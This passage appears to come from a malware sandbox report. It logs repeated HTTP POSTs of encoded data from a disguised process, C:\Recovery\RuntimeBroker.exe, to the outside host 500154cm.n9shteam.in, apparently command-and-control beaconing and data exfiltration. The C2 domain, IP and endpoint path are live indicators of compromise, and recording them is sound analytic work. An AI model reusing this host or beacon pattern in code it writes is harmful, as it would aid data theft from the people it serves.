                                                                                                            Date: Mon, 11 Nov 2024 23:42:47 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49775 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:48.506356001 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:48.854485035 CET | 2512 | OUT | Data Raw: 54 52 5b 57 56 50 5c 59 5c 58 5a 51 50 5d 58 5c 5b 53 5e 51 55 58 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TR[WVP\Y\XZQP]X\[S^QUXZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$,0!*)#<3'!8#)#&Y";=P'>!*>[7><&[!"^.
                                                                                                            Nov 12, 2024 00:42:49.092678070 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:49.166780949 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:48 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            35 | 192.168.2.4 | 49776 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:42:49.296787024 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:49.650609016 CET | 2512 | OUT | Data Raw: 54 51 5b 52 53 5a 59 5a 5c 58 5a 51 50 5d 58 51 5b 54 5e 5d 55 58 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TQ[RSZYZ\XZQP]XQ[T^]UXZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$:6\>(.5<'8X"($W)3&#+&'-*&#!_(5&[!"^.
                                                                                                            Nov 12, 2024 00:42:49.880039930 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:49.964745045 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:49 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            36 | 192.168.2.4 | 49777 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:42:50.093271017 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:50.447535992 CET | 2512 | OUT | Data Raw: 51 54 5b 51 53 5c 59 5e 5c 58 5a 51 50 52 58 56 5b 5d 5e 5d 55 5c 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT[QS\Y^\XZQPRXV[]^]U\Z___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'93!=+&5&'6$Z (4=3&"^%3>5)&4 -?&[!"^.
                                                                                                            Nov 12, 2024 00:42:50.676969051 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:50.753743887 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:50 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            37 | 192.168.2.4 | 49778 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:42:51.895159960 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            38 | 192.168.2.4 | 49779 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:42:52.158725977 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1840
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:52.510154009 CET | 1840 | OUT | Data Raw: 51 56 5b 53 56 5d 5c 5d 5c 58 5a 51 50 5c 58 52 5b 55 5e 5f 55 54 5a 58 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QV[SV]\]\XZQP\XR[U^_UTZX__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$,#-=%R"&%&;"++*3._6805(6-# &)5&[!"^.1
                                                                                                            Nov 12, 2024 00:42:52.726392984 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:52.807996988 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:52 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 21 1f 3f 03 3f 5e 22 2c 30 18 3a 58 21 0d 31 0e 20 13 3f 3b 38 17 22 2e 1a 5d 3b 23 26 08 34 00 37 03 24 29 29 5a 23 2f 0b 15 28 02 21 5b 05 12 21 18 20 38 28 56 28 12 20 13 2e 31 0a 06 36 56 3f 16 39 07 2f 55 2a 39 39 1e 27 2c 26 54 30 1f 2f 07 2e 58 22 5c 3f 2c 24 0e 21 24 2e 55 0b 11 20 09 25 38 38 09 23 2f 2c 06 32 3d 34 1c 22 04 3e 57 32 39 34 57 25 2a 3c 03 25 22 22 5c 31 32 2a 16 25 3a 2e 06 3e 17 33 12 25 2a 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: !??^",0:X!1 ?;8".];#&47$))Z#/(![! 8(V( .16V?9/U*99',&T0/.X"\?,$!$.U %88#/,2=4">W294W%*<%""\12*%:.>3%*#Q-/V=[W


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            39 | 192.168.2.4 | 49780 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:42:52.295039892 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:52.650631905 CET | 2512 | OUT | Data Raw: 51 51 5b 57 56 5a 59 52 5c 58 5a 51 50 5b 58 5d 5b 51 5e 5e 55 54 5a 55 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QQ[WVZYR\XZQP[X][Q^^UTZU__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'\9 )?;-"*D0% 8( *X#;)W0.>C.X#=+%&[!"^.-
                                                                                                            Nov 12, 2024 00:42:52.878885984 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:52.951802969 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:52 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            40 | 192.168.2.4 | 49781 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:42:53.079268932 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:53.447873116 CET | 2512 | OUT | Data Raw: 54 53 5e 53 53 5b 5c 58 5c 58 5a 51 50 5c 58 5c 5b 55 5e 50 55 59 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TS^SS[\X\XZQP\X\[U^PUYZ]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$.2[*;>",'58[!++)#*[58>0=>):Y4&?&[!"^.1
                                                                                                            Nov 12, 2024 00:42:53.669228077 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:53.746057034 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:53 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            41 | 192.168.2.4 | 49782 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:42:53.877695084 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:54.228776932 CET | 2512 | OUT | Data Raw: 54 54 5e 53 53 5a 59 52 5c 58 5a 51 50 5f 58 5d 5b 5c 5e 51 55 5d 5a 58 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TT^SSZYR\XZQP_X][\^QU]ZX__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'-36Z*W5='4X584=0>5:$.!Z*6:#V9\+&[!"^.=
                                                                                                            Nov 12, 2024 00:42:54.446647882 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:54.525438070 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:54 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            42 | 192.168.2.4 | 49783 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:42:54.657130957 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:55.010478020 CET | 2512 | OUT | Data Raw: 51 54 5b 52 56 5b 5c 58 5c 58 5a 51 50 5d 58 55 5b 57 5e 5d 55 5b 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT[RV[\X\XZQP]XU[W^]U[ZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$.01);W"<&E38X"=3"X5"$.[*C&70")%&[!"^.
                                                                                                            Nov 12, 2024 00:42:55.257982016 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:55.330940962 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:55 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            43 | 192.168.2.4 | 49784 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:42:55.481601000 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:55.838279963 CET | 2512 | OUT | Data Raw: 51 56 5e 55 56 5b 5c 5a 5c 58 5a 51 50 5f 58 55 5b 55 5e 50 55 54 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QV^UV[\Z\XZQP_XU[U^PUTZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$:3>*+W!*$3!;<V( *^!^&$=5>>[43)_<5&[!"^.=
                                                                                                            Nov 12, 2024 00:42:56.064641953 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:56.147361994 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:55 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49785 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:56.445975065 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:42:56.791649103 CET | 2512 | OUT | Data Raw: 54 53 5b 55 56 5c 5c 5e 5c 58 5a 51 50 5e 58 54 5b 56 5e 50 55 58 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
Data Ascii: TS[UV\\^\XZQP^XT[V^PUXZ\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$-0>^=%T5"D06' 8')#*[!&$>5>.Z !_?&[!"^.9
Nov 12, 2024 00:42:57.181226015 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:57.181324005 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:42:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ
Nov 12, 2024 00:42:57.181368113 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:42:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 30 56 58 5a
Data Ascii: 0VXZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49786 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:57.320962906 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:42:57.666299105 CET | 2512 | OUT | Data Raw: 54 50 5b 5f 56 50 5c 5e 5c 58 5a 51 50 5c 58 53 5b 57 5e 5a 55 59 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
Data Ascii: TP[_VP\^\XZQP\XS[W^ZUYZ^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^,0=;95$645+$(#.Z6;9%>Z=2Y 6<5&[!"^.1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49787 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:57.828654051 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 1840
Expect: 100-continue
Connection: Keep-Alive
Nov 12, 2024 00:42:58.181957960 CET | 1840 | OUT | Data Raw: 54 5e 5b 56 56 5b 59 5e 5c 58 5a 51 50 5f 58 50 5b 5c 5e 5d 55 58 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
Data Ascii: T^[VV[Y^\XZQP_XP[\^]UXZ]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'-3*\*8!!!$76;="!P$--]>"[7)5&[!"^.=
Nov 12, 2024 00:42:58.408297062 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 12, 2024 00:42:58.484771967 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 23:42:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Data Raw: 02 1e 22 0e 2a 3d 30 07 22 3f 27 08 2d 3d 39 0f 27 30 2c 59 3c 28 24 17 36 00 16 10 2c 0d 0f 55 23 3d 30 5d 30 3a 25 5e 34 3f 0b 1b 2b 12 21 5b 05 12 22 06 37 02 3c 55 3c 3f 28 5b 2c 31 23 5a 22 1e 37 14 2d 29 27 19 29 00 25 57 33 2c 39 0a 27 31 2c 5f 2d 58 29 00 2b 59 34 0f 21 0e 2e 55 0b 11 20 0c 27 06 0d 50 23 2f 0d 5a 27 2d 38 1f 35 3d 0f 0a 26 29 34 1d 32 3a 23 1e 26 22 2e 5d 32 32 39 04 26 5c 3a 01 2a 3a 27 12 24 2a 23 51 2d 05 2f 56 03 3d 5b 57
Data Ascii: "*=0"?'-=9'0,Y<($6,U#=0]0:%^4?+!["7<U<?([,1#Z"7-)')%W3,9'1,_-X)+Y4!.U 'P#/Z'-85=&)42:#&".]229&\:*:'$*#Q-/V=[W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49788 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 00:42:57.965363979 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 500154cm.n9shteam.in
Content-Length: 2512
Expect: 100-continue
Connection: Keep-Alive
